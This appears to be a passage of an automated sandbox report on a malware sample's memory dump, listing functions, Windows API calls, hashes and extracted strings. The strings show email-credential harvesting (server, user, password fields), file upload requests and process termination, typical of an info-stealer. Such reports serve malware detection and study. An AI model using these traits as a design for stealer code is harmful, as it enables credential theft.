CloseHandle.KERNEL32(?,?,?,?,?,?,049F8CA5), ref: 049FB716
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,049F8CA5), ref: 049FB742
RtlLeaveCriticalSection.NTDLL(00000000), ref: 049FB75F

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
String ID:
API String ID: 1496873005-0
Opcode ID: 00201e3db42668cb2f9d3240c484219641213582d73074d74d51b24c29c8e95a
Instruction ID: c28371d052e205c62f0de2ce86fcfc37710969b42e284bf6a173d71106661dda
Opcode Fuzzy Hash: 00201e3db42668cb2f9d3240c484219641213582d73074d74d51b24c29c8e95a
Instruction Fuzzy Hash: B3214CB5600709ABEB10AFB5DD84E9B7BBDEF58354B040034AA01E2160EB34FE468B60

Uniqueness

Uniqueness Score: -1.00%

Function 04A02A6C, Relevance: 10.6, APIs: 7, Instructions: 76memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(04A03A68,00000000,04A173A0,04A173C0,?,?,04A03A68,049F29FA,04A173A0), ref: 04A02A7C
RtlAllocateHeap.NTDLL(00000000,00000002), ref: 04A02A92
lstrlen.KERNEL32(049F29FA,?,?,04A03A68,049F29FA,04A173A0), ref: 04A02A9A
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04A02AA6
lstrcpy.KERNEL32(04A173A0,04A03A68), ref: 04A02ABC
HeapFree.KERNEL32(00000000,00000000,?,?,04A03A68,049F29FA,04A173A0), ref: 04A02B10
HeapFree.KERNEL32(00000000,04A173A0,?,?,04A03A68,049F29FA,04A173A0), ref: 04A02B1F

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen$lstrcpy
String ID:
API String ID: 1531811622-0
Opcode ID: 3cedb547a9775c99ab664f6b9a196ad81aa5281720be6b8089ea0f6e84c17fda
Instruction ID: 2f275b58eb333158a23a24f519c499154dbe8ce4b4a9459a4b8a5ed3242eaaed
Opcode Fuzzy Hash: 3cedb547a9775c99ab664f6b9a196ad81aa5281720be6b8089ea0f6e84c17fda
Instruction Fuzzy Hash: 4721F936104344BFFF224F68EC48F6A7FAAEB66750F548098E885972A1C775AD13C760

Uniqueness

Uniqueness Score: -1.00%

Function 049FC49B, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,74B05520,00000000,00000000,?,?,?,?,?,?), ref: 049FC4BB

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

wsprintfA.USER32 ref: 049FC4E5

Part of subcall function 04A01FB3: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,049FEBD7), ref: 04A01FC9
Part of subcall function 04A01FB3: wsprintfA.USER32 ref: 04A01FF1
Part of subcall function 04A01FB3: lstrlen.KERNEL32(?), ref: 04A02000
Part of subcall function 04A01FB3: wsprintfA.USER32 ref: 04A02040
Part of subcall function 04A01FB3: wsprintfA.USER32 ref: 04A02075
Part of subcall function 04A01FB3: memcpy.NTDLL(00000000,?,?), ref: 04A02082
Part of subcall function 04A01FB3: memcpy.NTDLL(00000008,04A133F4,00000002,00000000,?,?), ref: 04A02097
Part of subcall function 04A01FB3: wsprintfA.USER32 ref: 04A020BA

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 049FC55A

Part of subcall function 04A10EB8: RtlEnterCriticalSection.NTDLL(05A98D20), ref: 04A10ECE
Part of subcall function 04A10EB8: RtlLeaveCriticalSection.NTDLL(05A98D20), ref: 04A10EE9

HeapFree.KERNEL32(00000000,?,?,00000000,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 049FC542
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 049FC54E

Strings

Content-Disposition: form-data; name="upload_file"; filename="%s", xrefs: 049FC4DF
Content-Type: application/octet-stream, xrefs: 049FC4D7

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
String ID: Content-Disposition: form-data; name="upload_file"; filename="%s"$Content-Type: application/octet-stream
API String ID: 3553201432-2405033784
Opcode ID: 91fd9d86f6083f6d856bf541a720d2e7205eb8fe8c07785c29f16de700e07fef
Instruction ID: e60d65f1db9693f194c0292a9cbfe1626b18039dadcddf223a047d83b8cd0f9e
Opcode Fuzzy Hash: 91fd9d86f6083f6d856bf541a720d2e7205eb8fe8c07785c29f16de700e07fef
Instruction Fuzzy Hash: 4E21487680021CBBCF129F95DD44CCFBFB9FB88710F004426FA14A6160D775AA21DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 049FB20B, Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 049FA287: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000), ref: 049FA299
Part of subcall function 049FA287: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000,?,?,?,049F12EC), ref: 049FA2B2
Part of subcall function 049FA287: GetCurrentThreadId.KERNEL32 ref: 049FA2BF
Part of subcall function 049FA287: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000,?,?,?,049F12EC,00000000), ref: 049FA2CB
Part of subcall function 049FA287: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000), ref: 049FA2D9
Part of subcall function 049FA287: lstrcpy.KERNEL32(00000000), ref: 049FA2FB

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00001ED2,?,00000000,?,?,049F715B,00000000), ref: 049FB24C
HeapFree.KERNEL32(00000000,00000000,?,00000000,00001ED2,?,00000000,?,?,049F715B,00000000,?,00000006,?), ref: 049FB2BF

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
String ID:
API String ID: 2078930461-0
Opcode ID: eb9a96166d7ead8aaf85f4b2b1ca01f58b1097a3b1d1cc949fb81e32b8c7b3f3
Instruction ID: 6626e3b4a847385f43a59ac8c5a834f115d851f4fa560874b8a485b029709c1e
Opcode Fuzzy Hash: eb9a96166d7ead8aaf85f4b2b1ca01f58b1097a3b1d1cc949fb81e32b8c7b3f3
Instruction Fuzzy Hash: 1411B271240324BBFA216EA1EC8CFAF7E9DEB65765F004121FA01951E1D66AAC52C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04A01CF5, Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 70stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,74B05520,00000000,?,04A0AD19,00000007,?,00000000,?,00000000,00000000,?,?,?), ref: 04A01D04

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

Part of subcall function 049F24E9: memset.NTDLL ref: 049F24F7
Part of subcall function 049F24E9: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,049FCDC0,00000000,00000000), ref: 049F250C
Part of subcall function 049F24E9: CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 049F2519

Part of subcall function 049FF8F0: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,049F7633,00000000,00000000,00000004,00000000,?,049FCDE0,00000000,?,00000000), ref: 049FF8FC
Part of subcall function 049FF8F0: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,049F7633,00000000,00000000,00000004,00000000,?,049FCDE0,00000000), ref: 049FF95A
Part of subcall function 049FF8F0: lstrcpy.KERNEL32(00000000,00000000), ref: 049FF96A

lstrcpy.KERNEL32(00000038,?), ref: 04A01D41

Strings

User-Agent:, xrefs: 04A01D75
Host:, xrefs: 04A01D61
Accept-Encoding:, xrefs: 04A01D6B
GET, xrefs: 04A01D55
Connection:, xrefs: 04A01D7F

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CreateEventlstrcpylstrlen$AllocateHeapmemcpymemset
String ID: Accept-Encoding:$Connection:$GET$Host:$User-Agent:
API String ID: 2759563021-3467890120
Opcode ID: 197a95c3b32eecf8e25562212f23520a04c222765a20ee40a37e368c925e8e84
Instruction ID: dcd41624e0372980a4bb717afb3524c5e43ba6fa6475e1df0a01365dfe597e87
Opcode Fuzzy Hash: 197a95c3b32eecf8e25562212f23520a04c222765a20ee40a37e368c925e8e84
Instruction Fuzzy Hash: 9911B2B6200204BBBB11BF65ED80EFA37ADEF84758B108125F905D6150EB76FC418761

Uniqueness

Uniqueness Score: -1.00%

Function 04A01AF5, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 04A0E1AD: lstrlen.KERNEL32(00000000,00000000,7742C740,74B481D0,?,?,?,04A01B0F,253D7325,00000000,7742C740,74B481D0,?,?,049F331A,00000000), ref: 04A0E214
Part of subcall function 04A0E1AD: sprintf.NTDLL ref: 04A0E235

lstrlen.KERNEL32(00000000,253D7325,00000000,7742C740,74B481D0,?,?,049F331A,00000000,05A98D60), ref: 04A01B20
lstrlen.KERNEL32(?,?,?,049F331A,00000000,05A98D60), ref: 04A01B28

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

strcpy.NTDLL ref: 04A01B3F
lstrcat.KERNEL32(00000000,?), ref: 04A01B4A

Part of subcall function 04A075F2: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04A01B59,00000000,?,?,?,049F331A,00000000,05A98D60), ref: 04A07609

Part of subcall function 04A02A35: RtlFreeHeap.NTDLL(00000000,?,049F10F7,?,?,0000002C,?), ref: 04A02A41

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,049F331A,00000000,05A98D60), ref: 04A01B67

Part of subcall function 04A07F0A: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04A01B73,00000000,?,?,049F331A,00000000,05A98D60), ref: 04A07F14
Part of subcall function 04A07F0A: _snprintf.NTDLL ref: 04A07F72

Strings

=, xrefs: 04A01B61

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 592b2f5ef1660a921ed3a572d415be07fc7b14a28b792c50ecdf5e3e0bdc8765
Instruction ID: 1469783a74314b8a7d4f6e38b9c61359d986c3a2adf31ac21b697b1ed2946790
Opcode Fuzzy Hash: 592b2f5ef1660a921ed3a572d415be07fc7b14a28b792c50ecdf5e3e0bdc8765
Instruction Fuzzy Hash: 4C1191339016257B67226FB8AD84CBF2BADDF997683498055F90497140EF39ED0387A0

Uniqueness

Uniqueness Score: -1.00%

Function 04A0FE1D, Relevance: 10.6, APIs: 7, Instructions: 67threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32(?,?,049F1A0B), ref: 04A0FE48
CloseHandle.KERNEL32(?,?,049F1A0B), ref: 04A0FE54
CloseHandle.KERNEL32(00000000,74B5F720,?,04A0F2A2,00000000,?,?,?,049F1A0B), ref: 04A0FE66
memset.NTDLL ref: 04A0FE7D
memset.NTDLL ref: 04A0FE94
memset.NTDLL ref: 04A0FEAB
memset.NTDLL ref: 04A0FEC2

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: memset$CloseHandle$SwitchThread
String ID:
API String ID: 3699883640-0
Opcode ID: 45edb28798982aef55a659ff636fd1ccc7642582bd3c7491ed69d1af4ecf1784
Instruction ID: 29795214f92354d5f4b93c0ff2780ff40fb341dd4ebd4877776eef1cd24249fb
Opcode Fuzzy Hash: 45edb28798982aef55a659ff636fd1ccc7642582bd3c7491ed69d1af4ecf1784
Instruction Fuzzy Hash: 4C110AB598155067F9213B25BC45C8F3B6DEFE1B14B084425F904A71B2CB6C6D0347E6

Uniqueness

Uniqueness Score: -1.00%

Function 04A054BF, Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 04A054F0
wcstombs.NTDLL ref: 04A05501

Part of subcall function 049F4FA9: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,049FE76A,00000000,00000001,?,?,?,Kill,?,?), ref: 049F4FBB
Part of subcall function 049F4FA9: StrChrA.SHLWAPI(?,00000020,?,00000000,049FE76A,00000000,00000001,?,?,?,Kill,?,?), ref: 049F4FCA

OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 04A05522
TerminateProcess.KERNEL32(00000000,00000000), ref: 04A05531
CloseHandle.KERNEL32(00000000), ref: 04A05538
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04A05547
WaitForSingleObject.KERNEL32(00000000), ref: 04A05557

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
String ID:
API String ID: 417118235-0
Opcode ID: a78e893990d209ac8ea6c5090a83dad29dbdd9818c808299dcfee67dd3c797c8
Instruction ID: 891ec115bd947299ec58e97e255150ef67d8ee956fec9c524ff02d8c9a31f11b
Opcode Fuzzy Hash: a78e893990d209ac8ea6c5090a83dad29dbdd9818c808299dcfee67dd3c797c8
Instruction Fuzzy Hash: 79118231500215BBFB119F54EC49BAA7BAAFF24755F144010F905A61E0C7B9FE52CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A0E9AD, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,?,?,?,?,049F1786,?,00000000), ref: 04A0E9C8
lstrlen.KERNEL32( | "%s" | %u,?,?,?,?,049F1786,?,00000000), ref: 04A0E9D3
RtlAllocateHeap.NTDLL(00000000,?), ref: 04A0E9E4

Part of subcall function 049F4454: GetLocalTime.KERNEL32(00000000,00000000), ref: 049F445E
Part of subcall function 049F4454: wsprintfA.USER32 ref: 049F4491

wsprintfA.USER32 ref: 04A0EA07

Part of subcall function 04A025B3: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,04A0EA2F,?,00000000,00000000,00000000,00000006,00000000), ref: 04A025D1
Part of subcall function 04A025B3: wsprintfA.USER32 ref: 04A025EF

HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000006,00000000), ref: 04A0EA38

Strings

| "%s" | %u, xrefs: 04A0E9CA, 04A0E9CF, 04A0EA02

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
String ID: | "%s" | %u
API String ID: 3847261958-3278422759
Opcode ID: a8a4a5419ea99bf228888dabd41c28d70730f2e4ab352b2b4f2b0d5f872dca42
Instruction ID: 941d918bf4d09fd77cd5c4a2274fbbbc3eb47e4d06adf53194fcb6b91c08907a
Opcode Fuzzy Hash: a8a4a5419ea99bf228888dabd41c28d70730f2e4ab352b2b4f2b0d5f872dca42
Instruction Fuzzy Hash: DF11A071500218BFEF119F65EC44DAB7FADEB88358F104022F908E7160E635AE06DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 049F2C7E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringtimeCOMMON

Download Yara Rule

APIs

lstrcmpi.KERNEL32(00000000,Main), ref: 049F2C9F
RtlEnterCriticalSection.NTDLL(04A173A8), ref: 049F2CB1
RtlLeaveCriticalSection.NTDLL(04A173A8), ref: 049F2CC4
lstrcmpi.KERNEL32(04A173C0,00000000), ref: 049F2CE5
GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,049FF20F,00000000), ref: 049F2CF9

Strings

Main, xrefs: 049F2C97

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
String ID: Main
API String ID: 1266740956-521822810
Opcode ID: 7b610a8e3ea850ea7891f7d815de278cb6d91f3ad9a18cb41c7a705eee654732
Instruction ID: d7eb67d5af56075f212da4eb90c36d84a0cf2db696a8c5f51f3755e50399219f
Opcode Fuzzy Hash: 7b610a8e3ea850ea7891f7d815de278cb6d91f3ad9a18cb41c7a705eee654732
Instruction Fuzzy Hash: A7119035500204AFEF048F68DC49B99BBACFF18365B1440BAE915E72A0D779ED01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 049F76B3, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringCOMMON

Download Yara Rule

APIs

Part of subcall function 049FA287: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000), ref: 049FA299
Part of subcall function 049FA287: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000,?,?,?,049F12EC), ref: 049FA2B2
Part of subcall function 049FA287: GetCurrentThreadId.KERNEL32 ref: 049FA2BF
Part of subcall function 049FA287: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000,?,?,?,049F12EC,00000000), ref: 049FA2CB
Part of subcall function 049FA287: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000), ref: 049FA2D9
Part of subcall function 049FA287: lstrcpy.KERNEL32(00000000), ref: 049FA2FB

lstrcpy.KERNEL32(-000000FC,00000000), ref: 049F76ED
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 049F76FF
GetTickCount.KERNEL32 ref: 049F770A
GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 049F7716
lstrcpy.KERNEL32(00000000), ref: 049F7730

Strings

\Low, xrefs: 049F76DF

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
String ID: \Low
API String ID: 1629304206-4112222293
Opcode ID: 2537283cf71a1a81e7f21753bc97f06050df45b3b3bd07eb1463b260776cafc4
Instruction ID: 16fe307de50813d9179b8ce773a471fceaf821c2042d3ef89efeeebf1d4a2d28
Opcode Fuzzy Hash: 2537283cf71a1a81e7f21753bc97f06050df45b3b3bd07eb1463b260776cafc4
Instruction Fuzzy Hash: 2201B531201A24ABEB616FB99C48FAB779CEF65655B0100B5FA00D7190DB2CED0287B5

Uniqueness

Uniqueness Score: -1.00%

Function 04A10BC7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,-00000008), ref: 04A10BDE

Part of subcall function 04A008F2: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,00000057,?,00000000,00000000), ref: 04A00909
Part of subcall function 04A008F2: SetEvent.KERNEL32(?), ref: 04A00919

lstrlen.KERNEL32(?,?,?,?,?,04A05AE5,?,?), ref: 04A10C01
lstrlen.KERNEL32(?,?,?,?,04A05AE5,?,?), ref: 04A10C0B
memcpy.NTDLL(?,?,00004000,?,?,04A05AE5,?,?), ref: 04A10C1C
HeapFree.KERNEL32(00000000,?,?,?,?,04A05AE5,?,?), ref: 04A10C3E

Strings

Access-Control-Allow-Origin:, xrefs: 04A10BCC

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heaplstrlen$AllocateEventFreeObjectSingleWaitmemcpy
String ID: Access-Control-Allow-Origin:
API String ID: 442095154-3194369251
Opcode ID: 122579b216f993ed452f80678c684bbf5c8733ab1f45880cc6b4fcbd1c7ca166
Instruction ID: f20332e363129a952ef3362cb14fdbc40c4b34fd80ea7052b07284f9d13709d7
Opcode Fuzzy Hash: 122579b216f993ed452f80678c684bbf5c8733ab1f45880cc6b4fcbd1c7ca166
Instruction Fuzzy Hash: BB11AD75600644FFEB11AF64EC44F5ABBB9FB95320F208024E809E3260E735EE41DB20

Uniqueness

Uniqueness Score: -1.00%

Function 049FDD94, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 04A0BA39: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,04A058AA,?,?,-00000007,04A0A28F,-00000007,00000000,?,?,?,?), ref: 04A0BA48
Part of subcall function 04A0BA39: mbstowcs.NTDLL ref: 04A0BA64

lstrlenW.KERNEL32(00000000,00000000,00000094,%APPDATA%\Microsoft\,00000000,?,?,04A0223C,00000000), ref: 049FDDB9
RtlAllocateHeap.NTDLL(00000000,?), ref: 049FDDCB
CreateDirectoryW.KERNEL32(00000000,00000000,?,?,04A0223C,00000000), ref: 049FDDE8
lstrlenW.KERNEL32(00000000,?,?,04A0223C,00000000), ref: 049FDDF4
HeapFree.KERNEL32(00000000,00000000,?,?,04A0223C,00000000), ref: 049FDE08

Strings

%APPDATA%\Microsoft\, xrefs: 049FDD99

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
String ID: %APPDATA%\Microsoft\
API String ID: 3403466626-2699254172
Opcode ID: 4ef2e7eb696358ca617fb3b9d938657e25141d99fdf49b9b7fd6679da8d6cc18
Instruction ID: 1502f47f781193a51f78aefacb6e7373d7d7b17793c6e89ba64c8f4ff6a382b9
Opcode Fuzzy Hash: 4ef2e7eb696358ca617fb3b9d938657e25141d99fdf49b9b7fd6679da8d6cc18
Instruction Fuzzy Hash: A4017C72201214BFE711AF98EC48F9A7BACEF15754F110025F901971A0CBB8AE06CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 049F6405, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45timeCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 049F6418
CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 049F642A
SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 049F6454
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 049F6467
CloseHandle.KERNEL32(?), ref: 049F6470

Strings

0x%08X, xrefs: 049F6412

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
String ID: 0x%08X
API String ID: 603522830-3182613153
Opcode ID: bc98832e08ffee9c66ed6588ede0f1cf32deb1958e0f2871fd8221b80491b9eb
Instruction ID: 24ffdfba4ead386aaa0abb59e22f1cfdf1e84e7506875e7a3864f6ac166584a8
Opcode Fuzzy Hash: bc98832e08ffee9c66ed6588ede0f1cf32deb1958e0f2871fd8221b80491b9eb
Instruction Fuzzy Hash: 56014CB1901229BBEF00AF95DC09DEFBF7CEF15760F004154A916E2195E774AA02CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 049FD01A, Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 208stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,?,?,00000104,?,?,?,00000104,?,?,?,00000104,?,?,?), ref: 049FD131
lstrlen.KERNEL32(?,?,?,?,00000104,?,?,?,00000104,?,?,?,00000104,?,?,?), ref: 049FD13F

Part of subcall function 049F51B0: lstrlen.KERNEL32(?,00000104,?,00000000,049FD117,?,?,?,?,?,00000104,?,?,?,00000104), ref: 049F51BB
Part of subcall function 049F51B0: lstrcpy.KERNEL32(00000000,?), ref: 049F51D7

Strings

IMAP, xrefs: 049FD1DC
SMTP, xrefs: 049FD1C7
POP3, xrefs: 049FD1D5, 049FD1EE
type=%S, name=%S, address=%S, server=%S, port=%u, ssl=%S, user=%S, password=%S, xrefs: 049FD1EF

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$lstrcpy
String ID: IMAP$POP3$SMTP$type=%S, name=%S, address=%S, server=%S, port=%u, ssl=%S, user=%S, password=%S
API String ID: 805584807-1010173016
Opcode ID: eb5f076e7057949f7b5ef77f16ff6767db17fcb8fbe15f0ecded67425358226a
Instruction ID: 65b9a231bf6d4221523890387cea3ac77ff1ee2aecbdc35cdb655a6c97533195
Opcode Fuzzy Hash: eb5f076e7057949f7b5ef77f16ff6767db17fcb8fbe15f0ecded67425358226a
Instruction Fuzzy Hash: 68712C72A01119AFDF25DFA4DC84AEFBBB9BF08704F454669EA06A3110D730EA51CF90

Uniqueness

Uniqueness Score: -1.00%

Function 049FED38, Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

GetLastError.KERNEL32(?,?,?,00001000), ref: 049FEDB9
WaitForSingleObject.KERNEL32(00000000,00000000,?,?), ref: 049FEE3E
CloseHandle.KERNEL32(00000000), ref: 049FEE58
OpenProcess.KERNEL32(00100000,00000000,00000000,?,?), ref: 049FEE8D

Part of subcall function 049FB94C: RtlReAllocateHeap.NTDLL(00000000,00000000,00000000,049F525D), ref: 049FB95C

WaitForSingleObject.KERNEL32(?,00000064), ref: 049FEF0F
CloseHandle.KERNEL32(?), ref: 049FEF36

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
String ID:
API String ID: 3115907006-0
Opcode ID: 67a7003d16e66a6547288e65cd7f9e8b5d5b7acbe57a3cde502abb1135af4118
Instruction ID: 50aeb1db8b62d62d66764b00af83237685024ebe2e36cbe150539e327282a8ff
Opcode Fuzzy Hash: 67a7003d16e66a6547288e65cd7f9e8b5d5b7acbe57a3cde502abb1135af4118
Instruction Fuzzy Hash: A1811971D00219EFDF11DF98D984AADBBB5FF08354F148865EA05AB260D731BE51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A0D880, Relevance: 9.1, APIs: 6, Instructions: 122threadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,?), ref: 04A0D8DB
GetLastError.KERNEL32 ref: 04A0D901
SetEvent.KERNEL32(00000000), ref: 04A0D914
GetModuleHandleA.KERNEL32(00000000), ref: 04A0D95D
memset.NTDLL ref: 04A0D972
RtlExitUserThread.NTDLL(?), ref: 04A0D9A7

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: HandleModule$ErrorEventExitLastThreadUsermemset
String ID:
API String ID: 3978817377-0
Opcode ID: 62e7cfba2b6449776025cf12f0e9acb75f00d6c5b97837d454c4f275c5b5f94f
Instruction ID: 4bfb70cae238df696facaa85f560063c8b5fabff5408dae29731ae4b87d8fc8d
Opcode Fuzzy Hash: 62e7cfba2b6449776025cf12f0e9acb75f00d6c5b97837d454c4f275c5b5f94f
Instruction Fuzzy Hash: 32416072900604EFDB20DFA8ED88CAEBBBDFF857517248919E846E2554D734AD45CB20

Uniqueness

Uniqueness Score: -1.00%

Function 049FE50F, Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec757f477dd2326623e11ac07f47371c7f4a43a6fb50286e8047a75829ba09b3
Instruction ID: ab7a1ee89af5703d2b9ea7854e3c54c87c18846e1fe42748703b3c0d9ac17a0e
Opcode Fuzzy Hash: ec757f477dd2326623e11ac07f47371c7f4a43a6fb50286e8047a75829ba09b3
Instruction Fuzzy Hash: 5241B6716007149FDB20AF749C8896BB7EDFB44324B104A3DF6A6C21E0E771B8058B50

Uniqueness

Uniqueness Score: -1.00%

Function 04A08869, Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON

Download Yara Rule

APIs

OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 04A08883
CreateWaitableTimerA.KERNEL32(04A17160,00000003,?), ref: 04A088A0
